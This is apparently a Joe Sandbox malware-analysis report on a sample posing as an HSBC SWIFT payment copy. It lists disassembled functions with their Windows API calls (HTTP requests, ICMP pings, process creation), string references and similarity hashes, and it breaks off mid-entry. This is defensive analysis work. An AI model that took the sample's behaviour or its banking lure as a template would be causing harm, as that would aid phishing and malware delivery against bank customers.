Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 15ac7096cf55bec202286cb5f57403c3c0efc163b82fe6f97f92e4da0e87d080
Instruction ID: f45a6c10e7679650781b80bc62a0f7acd00939dc1e774ff525259e7754922a2e
Opcode Fuzzy Hash: 15ac7096cf55bec202286cb5f57403c3c0efc163b82fe6f97f92e4da0e87d080
Instruction Fuzzy Hash: CB61E3B0A40249EFDF11EFA4CC88DBE7BB8FB45306F144059E941A7252E739AD16DB20

Function 007A6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007A6FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007A6FA8
GetWindowLongW.USER32(?,000000F0), ref: 007A6FCC
_memset.LIBCMT ref: 007A6FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007A6FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007A7067

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 53e28c3b2cc032fb90a5ee31ef75d4a65d8b547b6d031babfa5d737a71de0f04
Instruction ID: c0f8bf71b2bc9b48bae6b4428c872147e3d5b77fc98e5187fbf683f048503790
Opcode Fuzzy Hash: 53e28c3b2cc032fb90a5ee31ef75d4a65d8b547b6d031babfa5d737a71de0f04
Instruction Fuzzy Hash: 2E618C75900248EFDB10DFA4CC85EEE77F8EB49714F144269FA14AB2A1C779AD41CBA0

Function 00776B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00776BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00776C18
VariantInit.OLEAUT32(?), ref: 00776C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00776C4A
VariantCopy.OLEAUT32(?,?), ref: 00776C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00776CB1
VariantClear.OLEAUT32(?), ref: 00776CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00776CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00776CDC
VariantClear.OLEAUT32(?), ref: 00776CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00776CF9

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 52c1fb0926ad728cfbd595f83fb80e8c988c8f289bdb3113d13bf5ec3f1f181c
Instruction ID: 7331eee5a3bc27718714341808c2521bc9def4d9ccfd3926b55cbdfd63c94b0f
Opcode Fuzzy Hash: 52c1fb0926ad728cfbd595f83fb80e8c988c8f289bdb3113d13bf5ec3f1f181c
Instruction Fuzzy Hash: 77417F71A00219DFCF00DFA8D8489EEBBB9EF48350F04C069E955E7261DB38A945CFA4

Function 00795732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00795793
inet_addr.WSOCK32(?,?,?), ref: 007957D8
gethostbyname.WSOCK32(?), ref: 007957E4
IcmpCreateFile.IPHLPAPI ref: 007957F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00795862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00795878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 007958ED
WSACleanup.WSOCK32 ref: 007958F3

Strings

Ping, xrefs: 00795816

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 7e9218a6909d36a408f98feb687d12d8d1cf8fa3879394f975a74600690275a0
Instruction ID: 45e8adf1f20c0e602a194de9788db1ce9ba6b56eb40f47680e518310a82958c3
Opcode Fuzzy Hash: 7e9218a6909d36a408f98feb687d12d8d1cf8fa3879394f975a74600690275a0
Instruction Fuzzy Hash: D7516D71604710DFDB11AF64EC49F2AB7E4EF49720F048929F996DB2A1DB38E900DB45

Function 0078B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0078B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0078B546
GetLastError.KERNEL32 ref: 0078B550
SetErrorMode.KERNEL32(00000000,READY), ref: 0078B5BD

Strings

READONLY, xrefs: 0078B588
INVALID, xrefs: 0078B58F
UNKNOWN, xrefs: 0078B575
READY, xrefs: 0078B596
NOTREADY, xrefs: 0078B57C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 242b57d26e20d18d0de06708beb3af89e53eb23f5728496ccd95d1b3644b9ad7
Instruction ID: 71634be749ac2ae5ec5952bd696409f149946cb5ceec5d0787bea0a1e0b49e02
Opcode Fuzzy Hash: 242b57d26e20d18d0de06708beb3af89e53eb23f5728496ccd95d1b3644b9ad7
Instruction Fuzzy Hash: 61319075A40209DFCB10FFA8D889EAE7BB4FF49310F148126F505D7291DB789A52CB91

Function 00778F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

Part of subcall function 0077AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0077AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00779014
GetDlgCtrlID.USER32 ref: 0077901F
GetParent.USER32 ref: 0077903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 0077903E
GetDlgCtrlID.USER32(?), ref: 00779047
GetParent.USER32(?), ref: 00779063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00779066

Strings

ListBox, xrefs: 00778FD1
ComboBox, xrefs: 00778F9C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 36ff2b06165cf4de50e00229393e9b68d5ac4295b71e9a8353d8895af32e079a
Instruction ID: a44a24a05d34a2af07a70a0de2c2391bd8591225f8ccf31c22d2f1a4fa24ee0f
Opcode Fuzzy Hash: 36ff2b06165cf4de50e00229393e9b68d5ac4295b71e9a8353d8895af32e079a
Instruction Fuzzy Hash: BB21F870A00108FBDF04ABA0CC89EFEBB74EF86310F108115F965972A1DB7D5815DB20

Function 0077907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

Part of subcall function 0077AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0077AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007790FD
GetDlgCtrlID.USER32 ref: 00779108
GetParent.USER32 ref: 00779124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00779127
GetDlgCtrlID.USER32(?), ref: 00779130
GetParent.USER32(?), ref: 0077914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 0077914F

Strings

ListBox, xrefs: 007790BC
ComboBox, xrefs: 00779087

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: d19997302ce83134fe7a0b3c96679dc43b315fe6fd61d9bd4f5e987b3b052e6c
Instruction ID: c9ea08607bda9865842a8c230c7e5b4d8492ee2a5b07be919dda8221f3931f7d
Opcode Fuzzy Hash: d19997302ce83134fe7a0b3c96679dc43b315fe6fd61d9bd4f5e987b3b052e6c
Instruction Fuzzy Hash: CC210474A00108FBDF14ABA4CC89EFEBB78EF89300F008016FA55972A1DB7D5819DB20

Function 00779163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0077916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00779184
_wcscmp.LIBCMT ref: 00779196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00779211

Strings

SHELLDLL_DefView, xrefs: 00779190
list, xrefs: 007791F3
largeicons, xrefs: 007791A5
smallicons, xrefs: 007791D9
details, xrefs: 007791BF

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 1945b15b45cf8ed44b34acd5fea663eca633a2cbbef6be74778949dd7d01cb62
Instruction ID: 2a57230b8a9dafd3a201b579a1a2d25a6ebb550ea4ce0beda369968d97214fe4
Opcode Fuzzy Hash: 1945b15b45cf8ed44b34acd5fea663eca633a2cbbef6be74778949dd7d01cb62
Instruction Fuzzy Hash: 20112777289317FAFE143624DC1EDA737ACAB11360B604026FA04E40D3FE6DA8215584

Function 00787990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00787A6C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 026636953163e951e3edeaf7644445bef464cd7bf269851019d79a3775e33f80
Instruction ID: c4c29c46980357e9b43497d13973e5084e2ab47ac0b5471239def9b6f9c6a5d2
Opcode Fuzzy Hash: 026636953163e951e3edeaf7644445bef464cd7bf269851019d79a3775e33f80
Instruction Fuzzy Hash: 80B19371944219DFDB04EFA4C884BBEBBB9FF49321F244429E602E7251D738E941CBA0

Function 0072FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0072FAA6
OleUninitialize.OLE32(?,00000000), ref: 0072FB45
UnregisterHotKey.USER32(?), ref: 0072FC9C
DestroyWindow.USER32(?), ref: 007645D6
FreeLibrary.KERNEL32(?), ref: 0076463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00764668

Strings

close all, xrefs: 0072FAA1

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 942241a290e3781bcbe07a3819f8a2509581cebcc1456d2ade0f6ccc939af975
Instruction ID: 5ff9698a691347d0818317105d63525235f9a13cd2cff1ef12d01c623a280448
Opcode Fuzzy Hash: 942241a290e3781bcbe07a3819f8a2509581cebcc1456d2ade0f6ccc939af975
Instruction Fuzzy Hash: 81A19070701222CFDB19EF14D598A69F774BF05700F5442BDE90AAB262DB38AC56CF50

Function 00799113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00799167
VariantInit.OLEAUT32(?), ref: 00799238
VariantInit.OLEAUT32(?), ref: 00799339
VariantClear.OLEAUT32(?), ref: 00799343
VariantClear.OLEAUT32(?), ref: 007993A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0079931C
Null Object assignment in FOR..IN loop, xrefs: 007991C8, 007992F6, 007993AE
,,{, xrefs: 007991E5

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,{$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-3894331932
Opcode ID: 2768303dacec087b858cc6a356dedb7938fc4b961cedead05a6f6576f9894900
Instruction ID: 1bd00cc4b08f7f5d70c9878be55ccb83555c4c898b28831503e6782e65ca2942
Opcode Fuzzy Hash: 2768303dacec087b858cc6a356dedb7938fc4b961cedead05a6f6576f9894900
Instruction Fuzzy Hash: 06917E71A00219EBEF24DFA9D848FAEB7B8EF45710F10815DF615AB280D7789945CFA0

Function 0077A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0077A439), ref: 0077A377

Strings

INSTANCE, xrefs: 0077A285
REGEXPCLASS, xrefs: 0077A13C
CLASSNN, xrefs: 0077A119
NAME, xrefs: 0077A1A9
TEXT, xrefs: 0077A2AE
CLASS, xrefs: 0077A0F6

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 7e3057141bbea2686cbd22153833c2220c634bf84d5cd1271b2055edfd930b56
Instruction ID: 2b95c41e43d97c170ace69db57688e31980a946d9f66d9ea965ccf96cc1d6178
Opcode Fuzzy Hash: 7e3057141bbea2686cbd22153833c2220c634bf84d5cd1271b2055edfd930b56
Instruction Fuzzy Hash: DE91AF31A04606EAEF08DFA0C459BEDFB74BF84340F54C129E84DA7251DB396999CBD1

Function 00722E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00722EAE

Part of subcall function 00721DB3: GetClientRect.USER32(?,?), ref: 00721DDC
Part of subcall function 00721DB3: GetWindowRect.USER32(?,?), ref: 00721E1D
Part of subcall function 00721DB3: ScreenToClient.USER32(?,?), ref: 00721E45

GetDC.USER32 ref: 0075CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0075CD45
SelectObject.GDI32(00000000,00000000), ref: 0075CD53
SelectObject.GDI32(00000000,00000000), ref: 0075CD68
ReleaseDC.USER32(?,00000000), ref: 0075CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0075CDFB

Strings

U, xrefs: 0075CCD0

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 413ed54c66d8f6af3072921c53051b0d0b6ab3033bb57c45573b63cd03f640c8
Instruction ID: b721aebddb6d9c9b383bade7a42b385d583ce4a596425b76ee70abc8be7660e0
Opcode Fuzzy Hash: 413ed54c66d8f6af3072921c53051b0d0b6ab3033bb57c45573b63cd03f640c8
Instruction Fuzzy Hash: 4471D231900309EFCF229F64CC84BEA7BB5FF49315F18426AED559A2A6C7788C45DB60

Function 00791A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00791A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00791A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00791ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00791AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00791AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00791B10
InternetCloseHandle.WININET(00000000), ref: 00791B57

Part of subcall function 00792483: GetLastError.KERNEL32(?,?,00791817,00000000,00000000,00000001), ref: 00792498
Part of subcall function 00792483: SetEvent.KERNEL32(?,?,00791817,00000000,00000000,00000001), ref: 007924AD

Strings

, xrefs: 00791B01

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: d3e947783936d35bf35bdb94e938e746bc164116ac1f0fdf15903fa4136e1edb
Instruction ID: c884b6f07889c1a98bb8a487e564d189d6699d3851abae64f6a448b2450ed1bf
Opcode Fuzzy Hash: d3e947783936d35bf35bdb94e938e746bc164116ac1f0fdf15903fa4136e1edb
Instruction Fuzzy Hash: 9341A1B1501219BFEF119F60DC89FFB7BADEF09350F408126F9059A191E7789E508BA4

Function 00798C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,007AF910), ref: 00798D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007AF910), ref: 00798D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00798ED6
SysFreeString.OLEAUT32(?), ref: 00798F00

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: cf1ec89319b09b657a5bf7e3d5803ae0aa8a7cd5b6091f8ed29759d9aff2d762
Instruction ID: ead94d182b7f0ef84ff2896580815e372ad31fd21e535436227707b51ebdae73
Opcode Fuzzy Hash: cf1ec89319b09b657a5bf7e3d5803ae0aa8a7cd5b6091f8ed29759d9aff2d762
Instruction Fuzzy Hash: 39F19D71A00209EFDF44DF98D888EAEB7B9FF49314F108098F915AB251DB35AE41CB61

Function 0079F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0079F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0079F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0079F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0079F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0079F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0079FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0079FA7C
CloseHandle.KERNEL32(?), ref: 0079FAAB
CloseHandle.KERNEL32(?), ref: 0079FB22

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: b1988d9a0c94d3b52792b78608ae1ab9cb5dd21fb964bf9044a911f384a35794
